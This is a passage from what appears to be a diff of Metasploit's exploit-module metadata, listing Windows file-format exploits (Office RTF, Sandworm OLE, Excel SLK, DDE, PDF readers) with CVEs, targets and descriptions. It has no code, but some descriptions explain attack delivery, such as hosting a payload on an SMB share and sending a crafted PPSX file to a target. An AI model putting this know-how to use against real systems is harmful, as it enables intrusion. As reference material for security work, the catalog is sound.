2007, 2003, and XP prior to the release of the\n MS10-087 bulletin are vulnerable.\n\n This module does not attempt to exploit the vulnerability via Microsoft Outlook.\n\n The Microsoft Word RTF parser was only used by default in versions of Microsoft\n Word itself prior to Office 2007. With the release of Office 2007, Microsoft\n began using the Word RTF parser, by default, to handle rich-text messages within\n Outlook as well. It was possible to configure Outlook 2003 and earlier to use\n the Microsoft Word engine too, but it was not a default setting.\n\n It appears as though Microsoft Office 2000 is not vulnerable. It is unlikely that\n Microsoft will confirm or deny this since Office 2000 has reached its support\n cycle end-of-life.", - "references": [ - "CVE-2010-3333", - "OSVDB-69085", - "MSB-MS10-087", - "BID-44652", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Microsoft Office 2002 SP3 English on Windows XP SP3 English", - "Microsoft Office 2003 SP3 English on Windows XP SP3 English", - "Microsoft Office 2007 SP0 English on Windows XP SP3 English", - "Microsoft Office 2007 SP0 English on Windows Vista SP0 English", - "Microsoft Office 2007 SP0 English on Windows 7 SP0 English", - "Crash Target for Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms10_087_rtf_pfragments_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms11_006_createsizeddibsection": { - "name": "MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms11_006_createsizeddibsection", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-12-15", - "type": "exploit", - "author": [ - "Moti & Xu Hao", - "Yaniv Miron aka Lament of ilhack", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in the handling of thumbnails\n within .MIC files and various Office documents. When processing a thumbnail bitmap\n containing a negative 'biClrUsed' value, a stack-based buffer overflow occurs. This\n leads to arbitrary code execution.\n\n In order to trigger the vulnerable code, the folder containing the document must be\n viewed using the \"Thumbnails\" view.", - "references": [ - "CVE-2010-3970", - "OSVDB-70263", - "MSB-MS11-006", - "BID-45662" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 SP0/SP4 English", - "Windows XP SP3 English", - "Crash Target for Debugging" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms11_006_createsizeddibsection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms11_021_xlb_bof": { - "name": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms11_021_xlb_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-08-09", - "type": "exploit", - "author": [ - "Aniway", - "Unknown", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Excel of Microsoft Office 2007.\n By supplying a malformed .xlb file, an attacker can control the content (source)\n of a memcpy routine, and the number of bytes to copy, therefore causing a stack-\n based buffer overflow. This results in arbitrary code execution under the context of\n the user.", - "references": [ - "CVE-2011-0105", - "OSVDB-71765", - "MSB-MS11-021", - "ZDI-11-121" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Excel 2007 on Windows XP", - "Microsoft Office Excel 2007 SP2 on Windows XP" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms11_021_xlb_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms12_005": { - "name": "MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability", - "fullname": "exploit/windows/fileformat/ms12_005", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-01-10", - "type": "exploit", - "author": [ - "Yorick Koster", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Microsoft Office's ClickOnce\n feature. When handling a Macro document, the application fails to recognize\n certain file extensions as dangerous executables, which can be used to bypass\n the warning message. This can allow attackers to trick victims into opening the\n malicious document, which will load up either a python or ruby payload, and\n finally, download and execute an executable.", - "references": [ - "CVE-2012-0013", - "OSVDB-78207", - "MSB-MS12-005", - "BID-51284", - "URL-http://support.microsoft.com/default.aspx?scid=kb;EN-US;2584146", - "URL-http://exploitshop.wordpress.com/2012/01/14/ms12-005-embedded-object-package-allow-arbitrary-code-execution/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office Word 2007/2010 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms12_005.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms12_005", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms12_027_mscomctl_bof": { - "name": "MS12-027 MSCOMCTL ActiveX Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms12_027_mscomctl_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-04-10", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez ", - "sinn3r " - ], - "description": "This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious\n RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited\n in the wild on April 2012.\n\n This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office\n 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses\n \"msgr3en.dll\", which will load after office got load, so the malicious file must\n be loaded through \"File / Open\" to achieve exploitation.", - "references": [ - "CVE-2012-0158", - "OSVDB-81125", - "BID-52911", - "MSB-MS12-027", - "URL-http://contagiodump.blogspot.com.es/2012/04/cve2012-0158-south-china-sea-insider.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English", - "Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms12_027_mscomctl_bof.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms12_027_mscomctl_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms13_071_theme": { - "name": "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution", - "fullname": "exploit/windows/fileformat/ms13_071_theme", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-09-10", - "type": "exploit", - "author": [ - "Eduardo Prado", - "juan vazquez ", - "Matthew Hall " - ], - "description": "This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows\n 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]\n section. An arbitrary path can be used as screen saver, including a remote SMB resource,\n which allows for remote code execution when a malicious .theme file is opened, and the\n \"Screen Saver\" tab is viewed. The code execution is also triggered if the victim installs\n the malicious theme and stays away from the computer, when Windows tries to display the\n screensaver.", - "references": [ - "CVE-2013-0810", - "OSVDB-97136", - "MSB-MS13-071", - "BID-62176", - "URL-http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040", - "URL-https://www.rapid7.com/blog/post/2013/09/25/change-the-theme-get-a-shell" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / Windows 2003 SP2" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/fileformat/ms13_071_theme.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms13_071_theme", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms14_017_rtf": { - "name": "MS14-017 Microsoft Word RTF Object Confusion", - "fullname": "exploit/windows/fileformat/ms14_017_rtf", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-04-01", - "type": "exploit", - "author": [ - "Haifei Li", - "Spencer McIntyre", - "unknown" - ], - "description": "This module creates a malicious RTF file that when opened in\n vulnerable versions of Microsoft Word will lead to code execution.\n The flaw exists in how a listoverridecount field can be modified\n to treat one structure as another.\n\n This bug was originally seen being exploited in the wild starting\n in April 2014. This module was created by reversing a public\n malware sample.", - "references": [ - "CVE-2014-1761", - "MSB-MS14-017", - "URL-http://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers", - "URL-https://www.virustotal.com/en/file/e378eef9f4ea1511aa5e368cb0e52a8a68995000b8b1e6207717d9ed09e8555a/analysis/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office 2010 SP2 English on Windows 7 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms14_017_rtf.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms14_017_rtf", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-down" - ], - "SideEffects": [ - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms14_060_sandworm": { - "name": "MS14-060 Microsoft Windows OLE Package Manager Code Execution", - "fullname": "exploit/windows/fileformat/ms14_060_sandworm", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-10-14", - "type": "exploit", - "author": [ - "Unknown", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly known as \"Sandworm\". Platforms such as Windows\n Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be\n vulnerable. However, based on our testing, the most reliable setup is on Windows platforms\n running Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such\n as using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to\n a failure in the CPackage::CreateTempFileName function.\n\n This module will generate three files: an INF, a GIF, and a PPSX file. You are required to\n set up a SMB or Samba 3 server and host the INF and GIF there. Systems such as Ubuntu or an\n older version of Windows (such as XP) work best for this because they require little\n configuration to get going. The PPSX file is what you should send to your target.\n\n In detail, the vulnerability has to do with how the Object Packager 2 component\n (packager.dll) handles an INF file that contains malicious registry changes, which may be\n leveraged for code execution. First of all, Packager does not load the INF file directly.\n As an attacker, you can trick it to load your INF anyway by embedding the file path as\n a remote share in an OLE object. The packager will then treat it as a type of media file,\n and load it with the packager!CPackage::OLE2MPlayerReadFromStream function, which will\n download it with a CopyFileW call, save it in a temp folder, and pass that information for\n later. The exploit will do this loading process twice: first for a fake gif file that's\n actually the payload, and the second for the INF file.\n\n The packager will also look at each OLE object's XML Presentation Command, specifically the\n type and cmd property. In the exploit, \"verb\" media command type is used, and this triggers\n the packager!CPackage::DoVerb function. Also, \"-3\" is used as the fake gif file's cmd\n property, and \"3\" is used for the INF. When the cmd is \"-3\", DoVerb will bail. But when \"3\"\n is used (again, for the INF file), it will cause the packager to try to find appropriate\n handler for it, which will end up with C:\\Windows\\System32\\infDefaultInstall.exe, and that\n will install/run the malicious INF file, and finally give us arbitrary code execution.", - "references": [ - "CVE-2014-4114", - "OSVDB-113140", - "MSB-MS14-060", - "BID-70419", - "URL-http://www.isightpartners.com/2014/10/cve-2014-4114/", - "URL-http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-windows-zero-day-vulnerability-cve-2014-4114-aka-sandworm/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1 / Office 2010 SP2 / Office 2013" - ], - "mod_time": "2023-03-13 10:31:27 +0000", - "path": "/modules/exploits/windows/fileformat/ms14_060_sandworm.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms14_060_sandworm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [], - "AKA": [ - "sandworm" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms14_064_packager_python": { - "name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python", - "fullname": "exploit/windows/fileformat/ms14_064_packager_python", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-11-12", - "type": "exploit", - "author": [ - "Haifei Li", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, bypassing the patch MS14-060, for the vulnerability\n publicly known as \"Sandworm\", on systems with Python for Windows installed. Windows Vista\n SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable.\n However, based on our testing, the most reliable setup is on Windows platforms running\n Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as\n those using Office 2010 SP1 may be less stable, and may end up with a crash due to a\n failure in the CPackage::CreateTempFileName function.", - "references": [ - "CVE-2014-6352", - "MSB-MS14-064", - "BID-70690", - "URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-for-the-sandworm-zero-day-even-editing-can-cause-harm" - ], - "platform": "Python", - "arch": "python", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1 with Python for Windows / Office 2010 SP2 / Office 2013" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/fileformat/ms14_064_packager_python.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms14_064_packager_python", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms14_064_packager_run_as_admin": { - "name": "MS14-064 Microsoft Windows OLE Package Manager Code Execution", - "fullname": "exploit/windows/fileformat/ms14_064_packager_run_as_admin", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-10-21", - "type": "exploit", - "author": [ - "Haifei Li", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE)\n allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass.\n The Microsoft update tried to fix the vulnerability publicly known as \"Sandworm\". Platforms\n such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known\n to be vulnerable. However, based on our testing, the most reliable setup is on Windows\n platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other\n setups such as using Office 2010 SP1 might be less stable, and may end up with a\n crash due to a failure in the CPackage::CreateTempFileName function.", - "references": [ - "CVE-2014-6352", - "MSB-MS14-064", - "BID-70690", - "URL-http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 SP1 / Office 2010 SP2 / Office 2013" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms14_064_packager_run_as_admin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms15_020_shortcut_icon_dllloader": { - "name": "Microsoft Windows Shell LNK Code Execution", - "fullname": "exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-03-10", - "type": "exploit", - "author": [ - "Michael Heerklotz", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the MS10-046 patch to abuse (again) the handling\n of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious\n DLL. This module creates the required files to exploit the vulnerability. They must be\n uploaded to an UNC path accessible by the target. This module has been tested successfully\n on Windows 2003 SP2 with MS10-046 installed and Windows 2008 SP2 (32 bits) with MS14-027\n installed.", - "references": [ - "CVE-2015-0096", - "MSB-MS15-020", - "URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459#.VQBOymTF9so", - "URL-https://github.com/rapid7/metasploit-framework/pull/4911" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms15_020_shortcut_icon_dllloader.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms15_020_shortcut_icon_dllloader", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms15_100_mcl_exe": { - "name": "MS15-100 Microsoft Windows Media Center MCL Vulnerability", - "fullname": "exploit/windows/fileformat/ms15_100_mcl_exe", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-09-08", - "type": "exploit", - "author": [ - "sinn3r " - ], - "description": "This module exploits a vulnerability in Windows Media Center. By supplying\n an UNC path in the *.mcl file, a remote file will be automatically downloaded,\n which can result in arbitrary code execution.", - "references": [ - "CVE-2015-2509", - "MSB-MS15-100" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms15_100_mcl_exe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/ms_visual_basic_vbp": { - "name": "Microsoft Visual Basic VBP Buffer Overflow", - "fullname": "exploit/windows/fileformat/ms_visual_basic_vbp", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-09-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Microsoft Visual\n Basic 6.0. When a specially crafted vbp file containing a long\n reference line, an attacker may be able to execute arbitrary\n code.", - "references": [ - "CVE-2007-4776", - "OSVDB-36936", - "BID-25629" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 English" - ], - "mod_time": "2021-02-13 04:10:13 +0000", - "path": "/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/ms_visual_basic_vbp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mswin_tiff_overflow": { - "name": "MS13-096 Microsoft Tagged Image File Format (TIFF) Integer Overflow", - "fullname": "exploit/windows/fileformat/mswin_tiff_overflow", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-11-05", - "type": "exploit", - "author": [ - "Unknown", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in Microsoft's Tagged Image File Format.\n It was originally discovered in the wild, targeting Windows XP and Windows Server 2003\n users running Microsoft Office, specifically in the Middle East and South Asia region.\n\n The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a\n drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,\n and stored in the EAX register. The 32-bit register will run out of storage space to\n represent the large value, which ends up being 0, but it still gets pushed as a\n dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a\n chunk anyway with size 0, and the address of this chunk is used as the destination buffer\n of a memcpy function, where the source buffer is the EXIF data (an extended image format\n supported by TIFF), and is also user-controlled. A function pointer in the chunk returned\n by HeapAlloc will end up being overwritten by the memcpy function, and then later used\n in OGL!GdipCreatePath. By successfully controlling this function pointer, and the\n memory layout using ActiveX, it is possible to gain arbitrary code execution under the\n context of the user.", - "references": [ - "CVE-2013-3906", - "MSB-MS13-096", - "OSVDB-99376", - "URL-http://technet.microsoft.com/en-us/security/advisory/2896666", - "URL-http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 with Office Standard 2010" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mswin_tiff_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/msworks_wkspictureinterface": { - "name": "Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Code Execution", - "fullname": "exploit/windows/fileformat/msworks_wkspictureinterface", - "aliases": [], - "rank": 100, - "disclosure_date": "2008-11-28", - "type": "exploit", - "author": [ - "dean " - ], - "description": "The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker\n to execute arbitrary code on a system. By passing a negative integer to the\n WksPictureInterface method, an attacker could execute arbitrary code on the system\n with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6.\n This control is not marked safe for scripting, please choose your attack vector carefully.", - "references": [ - "CVE-2008-1898", - "OSVDB-44458" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2-SP3 IE 7.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/msworks_wkspictureinterface.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/msworks_wkspictureinterface", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/mymp3player_m3u": { - "name": "Steinberg MyMP3Player 3.0 Buffer Overflow", - "fullname": "exploit/windows/fileformat/mymp3player_m3u", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-03-18", - "type": "exploit", - "author": [ - "n3w7u", - "m_101" - ], - "description": "This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When\n the application is used to open a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.", - "references": [ - "OSVDB-64580", - "EDB-11791" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal", - "Windows Universal (SEH)", - "Windows XP SP3 French" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/mymp3player_m3u.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/mymp3player_m3u", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/netop": { - "name": "NetOp Remote Control Client 9.5 Buffer Overflow", - "fullname": "exploit/windows/fileformat/netop", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-04-28", - "type": "exploit", - "author": [ - "Ruben Alejandro \"chap0\"" - ], - "description": "This module exploits a stack-based buffer overflow in NetOp Remote Control 9.5.\n When opening a .dws file containing a specially crafted string longer then 520\n characters will allow an attacker to execute arbitrary code.", - "references": [ - "OSVDB-72291", - "EDB-17223" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/netop.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/netop", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/nitro_reader_jsapi": { - "name": "Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution", - "fullname": "exploit/windows/fileformat/nitro_reader_jsapi", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-07-24", - "type": "exploit", - "author": [ - "mr_me ", - "bcoles ", - "sinn3r " - ], - "description": "This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro\n PDF Reader version 11. The saveAs() Javascript API function allows for writing\n arbitrary files to the file system. Additionally, the launchURL() function allows\n an attacker to execute local files on the file system and bypass the security dialog\n\n Note: This is 100% reliable.", - "references": [ - "CVE-2017-7442", - "URL-http://srcincite.io/advisories/src-2017-0005/", - "URL-https://blogs.securiteam.com/index.php/archives/3251" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/nitro_reader_jsapi.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/nitro_reader_jsapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/fileformat/nuance_pdf_launch_overflow": { - "name": "Nuance PDF Reader v6.0 Launch Stack Buffer Overflow", - "fullname": "exploit/windows/fileformat/nuance_pdf_launch_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-10-08", - "type": "exploit", - "author": [ - "corelanc0d3r ", - "rick2600" - ], - "description": "This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is\n triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record.\n This exploit does not use javascript.", - "references": [ - "OSVDB-68514", - "URL-http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-062-stack-buffer-overflow-in-nuance-pdf-reader-v6-0/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Nuance PDF Reader v6.x (XP SP3)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/nuance_pdf_launch_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_dde_delivery": { - "name": "Microsoft Office DDE Payload Delivery", - "fullname": "exploit/windows/fileformat/office_dde_delivery", - "aliases": [], - "rank": 0, - "disclosure_date": "2017-10-09", - "type": "exploit", - "author": [ - "mumbai" - ], - "description": "This module generates an DDE command to place within\n a word document, that when executed, will retrieve a HTA payload\n via HTTP from an web server.", - "references": [ - "URL-https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563", - "URL-https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Office" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/office_dde_delivery.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_dde_delivery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_excel_slk": { - "name": "Microsoft Excel .SLK Payload Delivery", - "fullname": "exploit/windows/fileformat/office_excel_slk", - "aliases": [], - "rank": 0, - "disclosure_date": "2018-10-07", - "type": "exploit", - "author": [ - "Carter Brainerd", - "Stan Hegt", - "Pieter Ceelen" - ], - "description": "This module generates a download and execute Powershell\n command to be placed in an .SLK Excel spreadsheet.\n When executed, it will retrieve a payload via HTTP\n from a web server. When the file is opened, the\n user will be prompted to \"Enable Content.\" Once\n this is pressed, the payload will execute.", - "references": [ - "URL-https://blog.appriver.com/2018/02/trojan-droppers-using-symbolic-link-files", - "URL-https://www.twitter.com/StanHacked/status/1049047727403937795", - "URL-http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Microsoft Excel" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/fileformat/office_excel_slk.rb", - "is_install_path": true, - "ref_name": "windows/fileformat/office_excel_slk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/fileformat/office_ms17_11882": { - "name": "Microsoft Office CVE-2017-11882", - "fullname": "exploit/windows/fileformat/office_ms17_11882", - "aliases": [], - "rank": 0, - "disclosure_date": "2017-11-15", - "type": "exploit", - "author": [ - "mumbai", - "embedi" - ], - "description": "Module exploits a flaw in how the Equation Editor that\n allows an attacker to execute arbitrary code in RTF files without\n interaction. The vulnerability is caused by the Equation Editor,\n to which fails to properly handle OLE objects in memory.", - "references": [ - "CVE-2017-11882", - "URL-http://web.archive.org/web/20211201000500/https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about", - "URL-https://github.com/embedi/CVE-2017-11882" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], 